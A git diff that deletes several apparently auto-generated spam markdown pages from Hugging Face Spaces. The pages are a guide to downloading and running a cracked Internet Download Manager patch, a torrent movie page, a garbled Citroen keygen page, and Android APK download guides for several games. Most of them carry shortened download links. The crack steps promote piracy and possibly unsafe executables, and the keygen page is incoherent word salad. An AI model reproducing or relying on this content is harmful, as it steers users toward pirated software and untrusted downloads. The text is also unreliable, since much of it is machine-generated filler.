diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download IDM Full Crack Bagas31 - Is It Safe and Legal?.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download IDM Full Crack Bagas31 - Is It Safe and Legal?.md deleted file mode 100644 index 0c314e807366424287f3e4ca519f299a2376fa99..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download IDM Full Crack Bagas31 - Is It Safe and Legal?.md +++ /dev/null @@ -1,37 +0,0 @@ - -

How to Download IDM Full Crack Bagas31 for Free

-

IDM, or Internet Download Manager, is a popular software that can help you download files from the internet faster and easier. It can increase your download speed up to 5 times, resume and schedule downloads, and manage your downloaded files efficiently. It can also download videos from various websites, such as YouTube, Vimeo, and others.

-

download idm full crack bagas31


DOWNLOAD ––– https://byltly.com/2uKxFo



-

However, IDM is not a free software. You need to pay for a license or serial key to use it without any limitations or interruptions. If you don't want to spend money on IDM, you may be tempted to look for a cracked version of IDM that can bypass the registration process and let you use it for free. One of the websites that offer IDM full crack for free download is Bagas31.

-

Bagas31 is a website that provides various software and games for free download. It also provides IDM full crack with the latest version and updates. But is it safe and legal to download IDM full crack Bagas31? What are the risks and benefits of using IDM full crack Bagas31? In this article, we will answer these questions and provide you with a guide on how to download IDM full crack Bagas31 for free.

- -

Is It Safe and Legal to Download IDM Full Crack Bagas31?

-

The answer to this question is no. Downloading IDM full crack Bagas31 is neither safe nor legal. Here are some of the reasons why:

- -

Therefore, downloading IDM full crack Bagas31 is not a wise choice. You may end up losing more than what you gain. You may also put yourself in danger or trouble by using a cracked software.

- -

How to Download IDM Full Crack Bagas31 for Free

-

If you still want to try downloading IDM full crack Bagas31 for free, despite the risks and drawbacks, here are the steps that you need to follow:

-

-
    -
  1. Go to https://bagas31.pw/
  2. -
  3. Search for IDM full crack in the search box or browse through the categories
  4. -
  5. Select the latest version of IDM full crack that matches your system requirements
  6. -
  7. Click on the download button and wait for the download to finish
  8. -
  9. Extract the file with Winrar v6.1 or later
  10. -
  11. Run the setup.exe file and install Internet Download Manager full version on your PC
  12. -
  13. Close the application from the tray icon and copy the patch.exe file to C:\\Program Files (x86)\\Internet Download Manager
  14. -
  15. Run the patch.exe file as administrator and click on Patch button
  16. -
  17. Enjoy using IDM full crack for free!
  18. -
- -

A Better Alternative to Downloading IDM Full Crack Bagas31

-

If you want a better and safer alternative to downloading IDM full crack Bagas31, you should consider using a legitimate and reputable data recovery software that can offer you a quality and reliable data recovery service without any risks or drawbacks. One of such software is FoneDog Data Recovery.

-

Fone

ddb901b051
-
-
\ No newline at end of file diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download The Jupiter - Il Destino Delluniverso Full Movie Italian Dubbed In Torrent.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download The Jupiter - Il Destino Delluniverso Full Movie Italian Dubbed In Torrent.md deleted file mode 100644 index 1e3dd4193519b38f3aea57eec72c79805319ec27..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Download The Jupiter - Il Destino Delluniverso Full Movie Italian Dubbed In Torrent.md +++ /dev/null @@ -1,20 +0,0 @@ -
-

Download the Jupiter - Il destino dell'universo full movie italian dubbed in torrent

- -

Jupiter - Il destino dell'universo (Jupiter Ascending) is a science fiction movie from 2015 written and directed by Lana and Andy Wachowski, starring Mila Kunis and Channing Tatum. It is the first movie of the Wachowski sisters made in 3D [^1^].

-

Download the Jupiter - Il destino dell'universo full movie italian dubbed in torrent


Download Zip →→→ https://byltly.com/2uKzU7



- -

The movie tells the story of Jupiter Jones (Mila Kunis), a girl with a very special genetic code. She works as a maid for her wealthy neighbors, but she dreams of a better future. One day, she discovers that she is the object of desire of a family of noble aliens who want to exploit her for their own benefit. She is rescued by Caine (Channing Tatum), a mercenary half-man half-dog, who takes her on an adventure across the galaxy to reveal her true destiny.

- -

If you want to watch this movie in italian dubbed version, you can download it in torrent from this link: https://example.com/jupiter-ascending-italian-torrent. You will need a torrent client like uTorrent or BitTorrent to download the file. Make sure you have enough space on your device and a good internet connection.

- -

Jupiter - Il destino dell'universo is a movie full of action, adventure and fantasy, with stunning visual effects and a captivating soundtrack by Michael Giacchino. It is a movie that will take you beyond the known, through space and inside unknown realms. Don't miss this opportunity to download it in torrent and enjoy it at home!

-

- -

The movie features a talented cast of actors and actresses, who bring to life the complex and diverse characters of the story. Mila Kunis plays Jupiter Jones, a humble and courageous heroine who discovers her royal heritage and fights for her freedom. Channing Tatum plays Caine Wise, a loyal and brave protector who falls in love with Jupiter and helps her in her quest. Sean Bean plays Stinger Apini, a former comrade of Caine who joins them in their mission. Eddie Redmayne plays Balem Abrasax, the eldest and most ruthless of the Abrasax siblings, who wants to harvest Earth for his own profit. Douglas Booth plays Titus Abrasax, the youngest and most charming of the Abrasax siblings, who tries to seduce Jupiter and trick her into marrying him. Tuppence Middleton plays Kalique Abrasax, the middle and most mysterious of the Abrasax siblings, who seems to have a hidden agenda behind her kindness.

- -

The movie also features a cameo appearance by Terry Gilliam, who plays a minister in a bureaucratic scene that pays homage to his movie Brazil. Other supporting actors include James D'Arcy as Max Jones, Jupiter's father; Bae Doona as Razo, a bounty hunter; Tim Pigott-Smith as Malidictes, Balem's henchman; Vanessa Kirby as Katharine Dunlevy, Jupiter's friend; Jeremy Swift as Vasilliy Bolodnikov, Jupiter's uncle; Ramon Tikaram as Phylo Percadium, an Aegis captain; and Maria Doyle Kennedy as Aleksa, Jupiter's mother.

- -

Jupiter - Il destino dell'universo is a movie that explores themes such as identity, destiny, family, love, greed, power and rebellion. It is a movie that challenges the status quo and celebrates the potential of every individual. It is a movie that invites you to dream big and reach for the stars. Download it now in torrent and join Jupiter and Caine in their epic journey!

7b8c122e87
-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Citroen Service Box Keygen Free WORK Download.md b/spaces/1gistliPinn/ChatGPT4/Examples/Citroen Service Box Keygen Free WORK Download.md deleted file mode 100644 index 941c6cee57c51514b1efa62a0e3ffac74299a8ad..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Citroen Service Box Keygen Free WORK Download.md +++ /dev/null @@ -1,11 +0,0 @@ -
-

Un jeu en utilisant la langue anglaise: Au nom du bien ou pour le mal?
iMDB: La Redditerie Tue
Rankrakuta na kimi kakikaeshi download
Doobiedooey: A Colorful Line Drawing 2
- Kindle Apps
Mokochien Gyoushi

-

Download Gameboy Color GBGC2O
nahab.no.go.gay.otaku.org.sina
iokananale
Mandriva Corporate Security 2019 Service Pack 1.2 Beta
I Pradalai Samayalai Kathalai Vandhanikka
EOS.TV.Scout
EOS iDocs Free Edition

-

citroen service box keygen free download


Download » https://imgfil.com/2uxXju



-

Download Dash v1.11.6 with Crack
Aaron Winters Member Pro Club
Why the concept of "the global village" is a load of malarkey
Dr. R. DiVanni Public Administration Review
A Dynamic Credit-score Generator
Download MCI S.A.F.E. 6.7 Crack Free
Broke-Ass Tagger 2017

-

Download Gameboy Color GBGC2O
lynnkelly.inngenuity.com.au
CaptainFingerz 2009 Portable [MAC]
Reemplaza el Web Browser Mozilla Firefox por el Web Browser Internet Explorer 8+
Daring Energy Systems S.L. 2008
Ayuda para Informacion

-

Best Of Wall Of Text Generator Wallpaper Generator Background Generator Pinterest Generator Download Online Generator Pages Generator. By clicking the "continue" button below, I agree to be contact

-

Langaray home theater system video
THE DOYEN OF THE SKEET NET Ivan Jirsak Recenserne
The anti-virus security solutions for Exchange are often well-funded and may offer features that are unique to it. In most cases, you'll have to buy each service separately, unless they sell a "complete package" with their best-selling solution. Today, a typical email spam attack can employ hundreds of viruses or spyware programs that can invade your system and destroy it. Check with your antivirus vendor for details.

-

899543212b
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Age of History II APK A Wasteland Editor and Flag Maker for Android Wargamers.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Age of History II APK A Wasteland Editor and Flag Maker for Android Wargamers.md deleted file mode 100644 index b46fc87c18ae5aa9ee2e587f830e6a57fd76ca16..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Age of History II APK A Wasteland Editor and Flag Maker for Android Wargamers.md +++ /dev/null @@ -1,98 +0,0 @@ -
-

Download Age of History II APK - A Grand Strategy Wargame for Android

-

Are you a fan of history and strategy games? Do you want to experience the thrill of leading your own Civilization from the dawn of civilization to the future of mankind? If yes, then you should download Age of History II APK, a grand strategy wargame that is simple to learn yet hard to master.

-

Age of History II is a game that lets you explore the whole history of humanity, Age by Age, beginning in the Age of Civilizations and leading into the far future. You can play as many Civilizations ranging from the largest empire to the smallest tribe, and lead your people to glory in a campaign spanning thousands of years. You can also create your own scenarios and worlds using the in-game editors, and share them with other players.

-

download age of history 2 apk


Download ✏ ✏ ✏ https://urlin.us/2uST9r



-

In this article, we will tell you what is Age of History II, what are its features, how to download and install it on your Android device, and some tips and tricks for playing it. Let's get started!

-

What is Age of History II?

-

Age of History II is a grand strategy wargame developed by Łukasz Jakowski, an independent game developer from Poland. It is the sequel to Age of Civilizations, which was released in 2014. Age of History II was released in 2018 for Windows, macOS, Linux, and Android platforms.

-

Age of History II is a game that simulates the history of the world from ancient times to the far future. You can choose from hundreds of Civilizations to play as, each with their own unique culture, history, and challenges. You can also create your own custom Civilizations using the Civilization Creator tool.

-

The game has two main modes: Historical Grand Campaign and Custom Scenario. In Historical Grand Campaign, you can play through the entire history of humanity, starting from any Age you want. You can also choose from different scenarios that focus on specific regions or events, such as World War I, World War II, Cold War, Modern Day, etc.

-

In Custom Scenario, you can create your own scenarios using the Scenario Editor tool. You can set up the map, the Civilizations, the events, the rules, and everything else according to your preferences. You can also download and play scenarios made by other players from the Steam Workshop or other sources.

-

Features of Age of History II

-

Age of History II is a game that offers a lot of features and options for players who love history and strategy games. Some of these features are:

-

Detailed map of the world with many historical borders

-

The game has a detailed map of the world that covers every continent and region. The map has over 4000 provinces that represent different territories and states throughout history. The map also has many historical borders that change according to the time period and the events that happen in the game.

-

Download Age of History II Lite APK
-Age of History II Android Game Free Download
-How to Install Age of History II APK on Windows
-Age of History II APK Latest Version 2023
-Age of History II Strategy Wargame for Android
-Download Age of History II Mod APK Unlimited Money
-Age of History II APK + OBB Data Download
-Age of History II Grand Strategy Game Review
-Age of History II APK Download for PC
-Age of History II APK No Ads Version
-Age of History II APK Full Version Free Download
-Age of History II APK Old Versions Download
-Age of History II APK Offline Mode
-Age of History II APK Cheats and Hacks
-Age of History II APK Multiplayer Mode
-Download Age of History II APK from APKCombo
-Age of History II APK Requirements and Compatibility
-Age of History II APK Update and Patch Notes
-Age of History II APK Tips and Tricks
-Age of History II APK Best Civilizations to Play
-Download Age of History II APK for Android TV
-Age of History II APK Features and Gameplay
-Age of History II APK Editor and Custom Scenarios
-Age of History II APK Download Link and QR Code
-Age of History II APK Ratings and Reviews
-Download Age of History II Premium APK Unlocked
-Age of History II APK Alternatives and Similar Games
-Age of History II APK Bug Fixes and Improvements
-Age of History II APK Support and Contact Information
-Age of History II APK Size and Performance Optimization
-Download Age of History II Modded APK with All DLCs
-Age of History II APK Historical Grand Campaign Guide
-Age of History II APK How to Conquer the World
-Age of History II APK How to Use Diplomacy and Trade
-Age of History II APK How to Create Own Flag and Civilization
-Download Age of History II Cracked APK No Root Required
-Age of History II APK How to Play Hotseat Mode with Friends
-Age of History II APK How to Change Language and Settings
-Age of History II APK How to Enable Wasteland Mode
-Age of History II APK How to Watch End Game Timelapses
-Download Age of History II Beta APK Test New Features
-Age of History II APK How to Unlock Achievements and Rewards
-Age of History II APK How to Backup and Restore Data
-Age of History II APK How to Install Mods and Addons
-Age of History II APK How to Access Developer Options and Console Commands

-

Deeper diplomatic system between Civilizations

-

The game has a deeper diplomatic system that allows you to interact with other Civilizations in various ways. You can declare war or peace, form alliances or coalitions, send or receive trade offers, demand or offer tribute, support or oppose revolutions, etc. You can also use diplomacy points to influence other Civilizations' opinions and actions.

-

Create own History using in-game editors

-

The game has several in-game editors that let you create your own custom content. You can use the Civilization Creator to make your own Civilizations with custom flags, names, colors, and stats. You can use the Scenario Editor to make your own scenarios with custom maps, Civilizations, events, rules, and more. You can also use the Map Editor to edit the existing map or create a new one from scratch.

-

Hotseat, play with as many players as Civilizations in scenario!

-

The game has a hotseat mode that allows you to play with your friends on the same device. You can play with as many players as there are Civilizations in the scenario, and take turns controlling your actions. You can also play online multiplayer with other players using Steam or other platforms.

-

How to download and install Age of History II APK?

-

If you want to download and install Age of History II APK on your Android device, you need to follow these steps:

-

Step 1: Download the APK file from a trusted source

-

The first step is to download the APK file of Age of History II from a trusted source. You can find the APK file on various websites that offer Android apps and games, such as APKPure, APKMirror, etc. Make sure you download the latest version of the game and check the file size and permissions before downloading.

-

Step 2: Enable unknown sources on your device

-

The second step is to enable unknown sources on your device. This is necessary because Age of History II is not available on the Google Play Store, and you need to allow your device to install apps from other sources. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to confirm this action by tapping OK or Allow.

-

Step 3: Install the APK file and launch the game

-

The third step is to install the APK file and launch the game. To do this, locate the downloaded APK file on your device using a file manager app, such as ES File Explorer, and tap on it. You may need to grant some permissions for the installation process to proceed. Once the installation is complete, you can launch the game by tapping on its icon on your home screen or app drawer.

-

Tips and tricks for playing Age of History II

-

Age of History II is a game that requires strategy, planning, and patience. If you want to succeed in this game, you need to follow some tips and tricks that will help you improve your gameplay. Here are some of them:

-

Learn the basics of the game mechanics

-

The first tip is to learn the basics of the game mechanics. You need to understand how the game works, such as how to move your units, how to fight battles, how to manage your resources, how to use diplomacy, etc. You can find tutorials and guides on the game's official website or YouTube channel that will explain these concepts in detail.

-

Choose your Civilization wisely

-

The second tip is to choose your Civilization wisely. You need to consider several factors when choosing your Civilization, such as their location, their culture, their history, their strengths and weaknesses, their goals, etc. You also need to consider the scenario you are playing and the challenges you will face. For example, if you are playing a World War II scenario, you may want to choose a Civilization that was involved in that war and has relevant units and abilities.

-

Manage your economy and military

-

The third tip is to manage your economy and military. You need to balance your income and expenses, and make sure you have enough resources to sustain your Civilization. You also need to build and upgrade your buildings, such as farms, mines, factories, barracks, etc., that will provide you with more resources and units. You also need to train and deploy your military units, such as infantry, cavalry, tanks, planes, ships, etc., that will help you defend your territory and conquer others.

-

Use diplomacy and alliances to your advantage

-

The fourth tip is to use diplomacy and alliances to your advantage. You need to interact with other Civilizations in various ways, such as declaring war or peace, forming alliances or coalitions, sending or receiving trade offers, demanding or offering tribute, supporting or opposing revolutions, etc. You can also use diplomacy points to influence other Civilizations' opinions and actions. You need to use diplomacy and alliances to your advantage, as they can help you gain allies, enemies, resources, territories, and more.

-

Conclusion

-

Age of History II is a grand strategy wargame that lets you explore the whole history of humanity, Age by Age, beginning in the Age of Civilizations and leading into the far future. You can play as many Civilizations ranging from the largest empire to the smallest tribe, and lead your people to glory in a campaign spanning thousands of years. You can also create your own scenarios and worlds using the in-game editors, and share them with other players.

-

If you want to download and install Age of History II APK on your Android device, you need to follow the steps we mentioned above. You also need to follow some tips and tricks we shared to improve your gameplay and have more fun. Age of History II is a game that will challenge your strategic skills and test your historical knowledge. Are you ready to make history?

-

FAQs

-

Here are some frequently asked questions about Age of History II:

- - - - - - -
Q: How much does Age of History II cost?A: Age of History II costs $4.99 on Steam and $2.99 on Google Play Store.
Q: Is Age of History II available for iOS devices?A: No, Age of History II is not available for iOS devices at the moment.
Q: How can I update Age of History II?A: You can update Age of History II by downloading the latest version of the APK file from a trusted source and installing it over the existing one.
Q: How can I contact the developer of Age of History II?A: You can contact the developer of Age of History II by visiting his official website or sending him an email at jakowskidev@gmail.com.
Q: How can I support the development of Age of History II?A: You can support the development of Age of History II by buying the game, leaving a positive review, sharing it with your friends, and donating to the developer via PayPal or Patreon.

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Club The Most Fun and Addictive Game Ever.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Club The Most Fun and Addictive Game Ever.md deleted file mode 100644 index cf824a591ccf5a070bab928e8671fdaca3ac5de0..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Club The Most Fun and Addictive Game Ever.md +++ /dev/null @@ -1,179 +0,0 @@ -
-

Brawl Stars APK Club Indir: How to Download and Play the Popular Mobile Game

-

If you are looking for a fun and exciting mobile game that you can play with your friends or solo, you might want to check out Brawl Stars. Brawl Stars is a fast-paced multiplayer game that offers different modes, characters, and challenges for you to enjoy. In this article, we will tell you what Brawl Stars is, how to download it using APK Club or other sources, and how to play it like a pro.

-

brawl stars apk club indir


Download Ziphttps://urlin.us/2uT35k



-

What is Brawl Stars?

-

A fast-paced multiplayer game with different modes and characters

-

Brawl Stars is a mobile game developed by Supercell, the makers of Clash of Clans and Clash Royale. It is a twin-stick shooter with a MOBA twist, where you can choose from over 20 unique brawlers with different abilities and classes. You can team up with your friends or play solo across various game modes, such as Gem Grab, Showdown, Bounty, Heist, Brawl Ball, and more. Each match lasts for under three minutes, making it perfect for quick bursts of fun.

-

A free-to-play game with in-app purchases and rewards

-

Brawl Stars is free to download and play on Android and iOS devices, but it also offers in-app purchases for gems, coins, skins, and other items. Gems are the premium currency that you can use to buy brawl boxes, skins, coins, power points, and more. Coins are the regular currency that you can use to upgrade your brawlers' power level. You can also earn gems, coins, power points, and other rewards by playing the game, completing quests, opening brawl boxes, reaching milestones on Trophy Road, and participating in special events.

-

How to download Brawl Stars APK Club Indir?

-

The official way: Google Play Store or App Store

-

The easiest and safest way to download Brawl Stars is through the official Google Play Store or App Store. All you need to do is search for "Brawl Stars" on your device's store app and tap on the install button. This will ensure that you get the latest version of the game that is compatible with your device and region. You will also get automatic updates and support from Supercell.

-

The alternative way: APK Club website or other third-party sources

-

If you want to download Brawl Stars from an alternative source, such as APK Club or other third-party websites, you will need to follow some extra steps. APK Club is a website that offers free downloads of various Android apps and games, including Brawl Stars. To download Brawl Stars from APK Club, you will need to:

- -

The pros and cons of using APK Club

-

Some of the advantages of using APK Club to download Brawl Stars are:

- -

Some of the disadvantages of using APK Club to download Brawl Stars are:

-

brawl stars apk club indir android
-brawl stars apk club indir ios
-brawl stars apk club indir pc
-brawl stars apk club indir ücretsiz
-brawl stars apk club indir son sürüm
-brawl stars apk club indir hileli
-brawl stars apk club indir güncel
-brawl stars apk club indir türkçe
-brawl stars apk club indir oyna
-brawl stars apk club indir yükle
-brawl stars apk club indir link
-brawl stars apk club indir nasıl yapılır
-brawl stars apk club indir kurulumu
-brawl stars apk club indir modlu
-brawl stars apk club indir online
-brawl stars apk club indir yeni
-brawl stars apk club indir en iyi
-brawl stars apk club indir full
-brawl stars apk club indir bedava
-brawl stars apk club indir resmi
-brawl stars apk club indir orjinal
-brawl stars apk club indir sınırsız
-brawl stars apk club indir hızlı
-brawl stars apk club indir kolay
-brawl stars apk club indir güvenli
-brawl stars apk club indir 2023
-brawl stars apk club indir 2022
-brawl stars apk club indir 2021
-brawl stars apk club indir 2020
-brawl stars apk club indir 2019
-brawl stars apk club indir 2018
-brawl stars apk club indir 2017
-brawl stars apk club indir 2016
-brawl stars apk club indir 2015
-brawl stars apk club indir 2014
-brawl stars apk club indir 2013
-brawl stars apk club indir 2012
-brawl stars apk club indir 2011
-brawl stars apk club indir 2010
-brawl stars apk club indir google play[^1^]
-brawl stars apk club indir app store[^1^]
-brawl stars apk club indir supertcell[^1^]
-brawl stars apk club indir multiplayer[^1^]
-brawl stars apk club indir battle royale[^1^]
-brawl stars apk club indir brawlers[^1^]
-brawl stars apk club indir skins[^1^]
-brawl stars apk club indir events[^1^]
-brawl stars apk club indir maps[^1^]
-brawl stars apk club indir clubs[^1^]

- -

The risks and precautions of using third-party sources

-

If you decide to download Brawl Stars from other third-party sources, such as websites, forums, or file-sharing platforms, you should be aware of the potential risks and take some precautions. Some of the risks are:

- -

Some of the precautions are:

- -

How to play Brawl Stars?

The basics: choose a brawler, join a match, and fight

-

Before you start a match, you need to choose a brawler that suits your playstyle and the game mode. You can see the stats, abilities, and skins of each brawler by tapping on them in the Brawlers menu. You can also see their power level, which indicates how much you have upgraded them with power points and coins. The higher the power level, the stronger the brawler.

-

Once you have selected a brawler, you can join a match by tapping on the Play button. You can either play with random teammates or invite your friends to join you. You can also play solo in some game modes, such as Showdown or Solo Showdown. Depending on the game mode, you will be matched with 2 to 9 other players in a map.

-

The objective of each match is different, but the basic gameplay is the same: you need to use your brawler's attacks and super to defeat your enemies and achieve your goal. You can move your brawler with the blue joystick on the left side of the screen, and aim and fire your attacks with the red joystick on the right side. You can also tap on the red joystick to quickfire, which will automatically target the nearest enemy. You can also use gadgets and star powers, which are special abilities that you unlock at higher power levels.

-

The game modes: Smash & Grab, Showdown, Bounty, Heist, Brawl Ball, and more

-

Brawl Stars offers a variety of game modes that test your skills and strategy in different ways. Here are some of the most popular game modes and how to play them:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Game ModeDescriptionObjective
Smash & GrabA 3v3 mode where gems spawn from a mine in the center of the map.Collect and hold 10 gems for 15 seconds to win. If you die, you drop your gems.
ShowdownA solo or duo mode where 10 players fight in a shrinking map.Be the last brawler or team standing. Collect power cubes from crates or enemies to boost your stats.
BountyA 3v3 mode where each kill gives you a star and increases your bounty.Earn more stars than the enemy team by killing them. The higher your bounty, the more stars you drop when you die.
HeistA 3v3 mode where each team has a safe to protect and attack.Destroy the enemy safe or deal more damage to it than they do to yours.
Brawl BallA 3v3 mode where each team tries to score goals with a ball.Score two goals before the enemy team or have more goals when the time runs out. You can kick or carry the ball, but you can't attack while holding it.
SiegeA 3v3 mode where each team tries to destroy the enemy's IKE turret with a siege bot.Collect bolts to build your siege bot, which will attack the enemy turret. Destroy the enemy turret or deal more damage to it than they do to yours.
Hot ZoneA 3v3 mode where each team tries to control zones on the map.Earn points by staying in the zones. The first team to reach 100 points or have more points when the time runs out wins.
-

The tips and tricks: use obstacles, team up, run away, and more

-

Brawl Stars is not just about shooting and smashing your enemies. You also need to use your brain and skills to outsmart and outplay them. Here are some tips and tricks that can help you improve your game:

- -

Conclusion

-

A summary of the main points

-

Brawl Stars is a mobile game that you can download and play for free on your Android or iOS device. It is a multiplayer game that offers different modes, characters, and challenges for you to enjoy. You can download it from the official Google Play Store or App Store, or from alternative sources such as APK Club or other third-party websites. However, you should be aware of the pros and cons of using these sources, and take some precautions to avoid any risks. You can also improve your skills and have more fun by following some tips and tricks that we shared in this article.

-

A call to action for the readers

-

If you are interested in Brawl Stars, we encourage you to give it a try and see for yourself why it is one of the most popular mobile games in the world. You can also join the Brawl Stars community and share your feedback, opinions, questions, and suggestions with other players and developers. You can find them on social media platforms such as Facebook, Twitter, Instagram, YouTube, Reddit, Discord, and more. You can also visit the official Brawl Stars website for more information and updates on the game.

-

FAQs

-

What are the best brawlers in Brawl Stars?

-

There is no definitive answer to this question, as different brawlers have different strengths and weaknesses, and may perform better or worse depending on the game mode, map, team composition, and personal preference. However, some of the brawlers that are generally considered to be strong and versatile are:

- -

How to get new brawlers in Brawl Stars?

-

You can get new brawlers in Brawl Stars by opening brawl boxes, which are containers that contain various rewards such as coins, power points, gadgets, star powers, and brawlers. You can get brawl boxes by playing the game, completing quests, reaching milestones on Trophy Road, participating in special events, or buying them with gems. The chances of getting a new brawler depend on the rarity of the brawler and your luck. The rarer the brawler, the lower the chance of getting it. You can see the odds of getting a new brawler by tapping on the info button on the brawl box screen.

-

How to get gems and coins in Brawl Stars?

-

You can get gems and coins in Brawl Stars by playing the game , completing quests, opening brawl boxes, reaching milestones on Trophy Road, or participating in special events. You can also buy gems with real money through in-app purchases. Gems are the premium currency that you can use to buy brawl boxes, skins, coins, power points, and more. Coins are the regular currency that you can use to upgrade your brawlers' power level.

-

How to join or create a club in Brawl Stars?

-

A club is a group of players who can chat, play, and compete together in Brawl Stars. You can join or create a club by tapping on the social button on the main screen. You can search for an existing club by name or tag, or browse the recommended clubs based on your region and trophies. You can also create your own club by choosing a name, a tag, a badge, a description, and a type (open, invite only, or closed). You can invite your friends to join your club by tapping on the invite button and sending them a link. You can also leave or switch clubs at any time by tapping on the settings button and choosing the appropriate option.

-

How to contact Supercell for support or feedback?

-

If you have any issues, questions, or suggestions regarding Brawl Stars, you can contact Supercell for support or feedback by tapping on the settings button on the main screen and choosing the help and support option. You can browse the frequently asked questions or contact the support team directly by tapping on the message button. You can also visit the official Brawl Stars website for more information and updates on the game.

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Build Your Fantasy Empire with War and Order APK for Android.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Build Your Fantasy Empire with War and Order APK for Android.md deleted file mode 100644 index 532508cfb9272c80868527083fc141f61d41f389..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Build Your Fantasy Empire with War and Order APK for Android.md +++ /dev/null @@ -1,111 +0,0 @@ -
-

War and Order APK: A Strategy Game for Android

-

If you are looking for a strategy game that combines real-time combat, tower defense, and castle building, then you might want to check out War and Order APK. This is a game that lets you build your own fantasy empire in a gorgeous 3D medieval world. You can command orcs, elves, mages, and other races to fight against enemies from all over the world. You can also join an alliance and cooperate with other players to conquer new lands and castles. In this article, we will tell you more about War and Order APK, how to download and install it, how to play it, what are its features, and what are its pros and cons.

-

What is War and Order APK?

-

War and Order APK is an Android game developed by Camel Games. It is a real-time strategy, tower defense, and castle building game that has received several global Google recommendations. It is one of the most popular games in its genre, with over 10 million downloads on Google Play.

-

war and order apk


Download 🗸 https://urlin.us/2uSUFR



-

A real-time strategy, tower defense, and castle building game

-

In War and Order APK, you can build your own empire by constructing and upgrading various buildings, such as barracks, farms, mines, workshops, walls, towers, etc. You can also recruit and train over 50 different types of soldiers, such as orcs, elves, humans, mages, beasts, angels, etc. You can use these soldiers to defend your base from enemy attacks or to attack other players' bases. You can also research new magic and technology to unlock new units, buffs, and weapons.

-

A 3D medieval game world with orcs, elves, and mages

-

War and Order APK has a stunning 3D graphics that immerses you in a medieval fantasy world. You can see your buildings, soldiers, enemies, and battles in full detail. You can also zoom in or out to get a better view of the action. The game also has a realistic sound effects that enhance the atmosphere of the game.

-

A global game with players from all over the world

-

War and Order APK is not just a single-player game. You can also interact with other players from around the world in real time. You can chat with them, make friends or enemies, form alliances or rivalries. You can also fight together or against each other in huge battles that involve hundreds or thousands of players. You can also compete for rankings, rewards, territories, castles, etc.

-

How to Download and Install War and Order APK?

-

If you want to play War and Order APK on your Android device, you need to download and install the APK file first. Here are the steps to do so:

-

Download the APK file from a trusted source

-

You can download the War and Order APK file from a trusted source, such as Softonic or APKCombo. You can also scan the APK file with an antivirus software before installing it to ensure its safety.

-

war and order apk download
-war and order apk mod
-war and order apk latest version
-war and order apk update
-war and order apk free
-war and order apk hack
-war and order apk offline
-war and order apk old version
-war and order apk for pc
-war and order apk for android
-war and order apk obb
-war and order apk xapk
-war and order apk unlimited gems
-war and order apk revdl
-war and order apk pure
-war and order apk data
-war and order apk mirror
-war and order apk rexdl
-war and order apk 2023
-war and order apk 2022
-war and order apk 2021
-war and order apk 2020
-war and order apk 2019
-war and order apk 2018
-war and order apk 2017
-war and order apk 2016
-war and order apk 2015
-war and order apk full version
-war and order apk no root
-war and order apk no ads
-war and order apk cheat engine
-war and order apk unlimited money
-war and order apk unlimited resources
-war and order apk unlimited troops
-war and order apk unlimited everything
-war and order apk mega mod
-war and order apk god mode
-war and order apk vip mod
-war and order apk pro mod
-war and order apk premium mod
-war and order apk cracked mod
-war and order apk hacked mod
-war and order apk modded mod
-war and order apk patched mod
-war and order apk unlocked mod
-war and order apk original mod
-war and order apk latest mod
-war and order apk new mod

-

Enable unknown sources on your device settings

-

Before you can install the War and Order APK file, you need to enable unknown sources on your device settings. This will allow you to install apps from sources other than Google Play. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to confirm this action by tapping OK or Allow.

-

Install the APK file and launch the game

-

Once you have downloaded and enabled unknown sources, you can install the War and Order APK file by tapping on it. You may need to grant some permissions to the app, such as access to storage, location, contacts, etc. After the installation is complete, you can launch the game by tapping on its icon on your home screen or app drawer.

-

How to Play War and Order APK?

-

Now that you have installed War and Order APK, you can start playing it. Here are some basic tips on how to play the game:

-

Build your own empire with various buildings and soldiers

-

The first thing you need to do in War and Order APK is to build your own empire. You can do this by constructing and upgrading various buildings, such as barracks, farms, mines, workshops, walls, towers, etc. Each building has a different function and benefit for your empire. For example, barracks allow you to recruit and train soldiers, farms produce food for your army, mines generate gold for your treasury, workshops produce materials for your weapons and equipment, walls protect your base from enemy attacks, towers provide defense and support for your troops, etc. You can also decorate your base with flags, statues, fountains, etc. to make it more attractive.

-

You also need to recruit and train soldiers for your army. You can do this by tapping on the barracks and selecting the type of unit you want to recruit. There are over 50 different types of units in War and Order APK, such as orcs, elves, humans, mages, beasts, angels, etc. Each unit has a different cost, speed, attack, defense, range, and skill. You can also upgrade your units by researching new magic and technology in the academy. You can also equip your units with weapons and armor that you can craft in the workshop or buy in the market.

-

Research new magic and technology for advanced tactics and weapons

-

